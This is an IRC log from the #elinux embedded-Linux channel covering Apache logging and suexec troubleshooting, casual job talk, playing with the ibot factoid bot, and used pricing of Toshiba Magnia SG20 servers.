17:57.51 | *** part/#elinux lossy (~drago@p3EE2FF74.dip.t-dialin.net) |
17:59.02 | sorphin | hmm.. all my logs have are codered/nimda and that formmail |
17:59.05 | sorphin | i feel left out ;) |
18:00.21 | sorphin | Morn: http://httpd.apache.org/docs/suexec.html |
18:00.55 | Morn | and if it was something like that I would expect others to be seeing this too |
18:01.33 | sorphin | i don't think many people leave their apache "Default" |
18:01.36 | sorphin | i build my own ;p |
18:02.42 | Morn | I do a bit, but I leave some alone |
18:02.52 | Morn | I don't think it is suexec though |
18:02.52 | Morn | since the process runs as the apache user |
18:03.09 | sorphin | only thing i can think of atm |
18:04.25 | sorphin | might wanna bump up your logging? |
18:05.18 | Morn | suexec is removed |
18:06.11 | Morn | LogLevel debug ?? |
18:06.41 | sorphin | that should help |
18:06.52 | sorphin | set it only for your webserver only |
18:06.54 | sorphin | not any vhosts |
18:07.01 | Morn | right |
20:02.16 | *** join/#elinux ibot (ibot@rikers.org) |
20:02.16 | *** topic/#elinux is Embedded Linux || http://eLinux.org/ || cross compile, uClibc, busybox, tinylogin, handhelds, post-sale linux installs ;-), etc. || debian-handheld list is up. |
20:02.16 | *** mode/#eLinux [+o ibot] by ChanServ |
20:12.31 | sorphin | ibot: wb |
20:12.32 | | It's great to be back! |
20:33.59 | *** join/#elinux sjhill (~NOYB@207-191-210-241.cpe.ats.mcleodusa.net) |
20:34.06 | prpplague | sjhill: lo ho |
20:34.19 | prpplague | sjhill: are you still a jobless bum? |
20:34.31 | sjhill | prpplague: nope, moving to pittsburgh this weekend |
20:34.41 | prpplague | sjhill: pittsburgh? eww |
20:34.55 | sjhill | prpplague: it's getting to be a nice city |
20:35.18 | prpplague | sjhill: what kinda job? |
20:35.41 | sjhill | prpplague: TimeSys - real-time embedded Linux |
20:35.47 | prpplague | sjhill: cool |
20:36.01 | prpplague | sjhill: congrats |
20:36.06 | *** join/#elinux Morn (~julie@ultrasparc.ipv6.magenet.com) [NETSPLIT VICTIM] |
20:36.07 | sjhill | thx |
20:36.14 | sjhill | hi sorphin |
20:36.16 | prpplague | sjhill: $250k/year right? |
20:36.19 | sjhill | lo' Lethal |
20:36.35 | sjhill | prpplague: heh, no, but i got my same salary i had at Broadcom...so i'm happy |
20:36.56 | prpplague | sjhill: what about moving expenses? |
20:40.08 | sjhill | all covered |
20:40.12 | sorphin | sjhill: lo |
20:40.42 | sjhill | bbl guys |
20:41.14 | CosmicPenguin | 32 people... aren't we popular |
20:57.41 | *** part/#elinux da-ve (~dave@212.204.35.114) |
21:10.41 | theDevil- | hehe |
21:16.54 | sorphin | <theDevil-> made me do it :P |
21:21.52 | kergoth | ibot: perl's buildsystem |
21:21.53 | | methinks perl's buildsystem is the devil! |
21:21.57 | kergoth | heheh |
21:24.31 | sorphin | heh |
21:24.35 | sorphin | Rick Berman Doesn't Know Why Nemesis Tanked |
21:24.41 | sorphin | because Rick Berman sucks |
21:27.31 | prpplague | ya get a clue |
21:27.53 | sorphin | ibot: digi |
21:27.53 | | sorphin: have you tried http://www.tldp.org/ ? |
21:27.57 | sorphin | bah |
21:28.20 | sorphin | ibot: digi is hell, and kergoth is it's slave. |
21:28.21 | | okay, sorphin |
21:28.27 | kergoth | truee that |
21:28.28 | sorphin | ibot: digi? |
21:28.28 | | [digi] hell, and kergoth is it's slave. |
21:28.38 | sorphin | doh |
21:28.55 | sorphin | ibot: no digi is digi is hell, and kergoth is its slave. |
21:28.56 | | sorphin: I think you lost me on that one |
21:29.03 | sorphin | ibot: forget digi |
21:29.03 | | i forgot digi, sorphin |
21:29.06 | kergoth | need a comma after the no |
21:29.10 | sorphin | ibot: digi is digi is hell, and kergoth is its slave. |
21:29.10 | | I think you lost me on that one, sorphin |
21:29.27 | sorphin | ibot: digi is hell and kergoth is its slave. |
21:29.28 | | okay, sorphin |
21:29.34 | sorphin | ibot: digi |
21:29.34 | | digi is, like, hell and kergoth is its slave. |
21:29.39 | sorphin | coo |
22:06.59 | *** join/#elinux TheMasterMind1 (foobar@h-69-3-152-153.MCLNVA23.covad.net) |
22:58.33 | *** part/#elinux Rocinante ([MFzRVPw2O@12-254-194-122.client.attbi.com) |
23:04.27 | pattieja | kergoth: I called DataComm Warehouse about the Magnia SG20 server |
23:04.42 | kergoth | pattieja: ah, what'd they have to say? |
23:05.04 | pattieja | kergoth: they couldn't give me an answer on the discrepancy between them selling the units for $300 and Toshiba (the vendor) selling them for $1400 |
23:05.48 | pattieja | plus, they're selling the unit that only has 1 20GB HDD and a PCMCIA slot (empty of course) which is "WiFi-ready" Ooooh! |
23:05.57 | kergoth | hehe |
23:06.04 | pattieja | the Wireless network adapter is extra |
23:06.46 | pattieja | the salesman didn't really know how long they would be able to carry the model and I suppose it's really up to how long/how many Celeron 566's Intel is going to continue to make |
23:06.51 | kergoth | I ended up picking one up off ebay, new, w/ 2 20gb for $250. course that doesn't help you trying to use them for a customer.. but fyi that's what they run for amongst individuals |
23:06.59 | pattieja | that and whether the CPU is embedded on the board or replaceable |
23:07.12 | pattieja | interesting |
23:07.21 | kergoth | hmm, I'll open mine up when i receive it and let you know |
23:07.23 | pattieja | Tiger's got 'em for $45 more |
23:07.33 | pattieja | 294.99 or similar |
23:09.19 | pattieja | kergoth: I'd really appreciate it. :) |
23:11.26 | *** join/#elinux TomW (tom@24.229.147.16) |
23:12.17 | TomW | sorphin: I'm awake again. :) |
23:12.46 | TomW | sorphin: one more 8051 program to go and then I can play with WebPal! |
23:20.22 | *** join/#elinux Morn (~julie@ultrasparc.ipv6.magenet.com) |
23:27.39 | *** join/#elinux mastermnd (~mastermnd@h004854622ae6.ne.client2.attbi.com) |
23:54.10 | sieve | g'night all |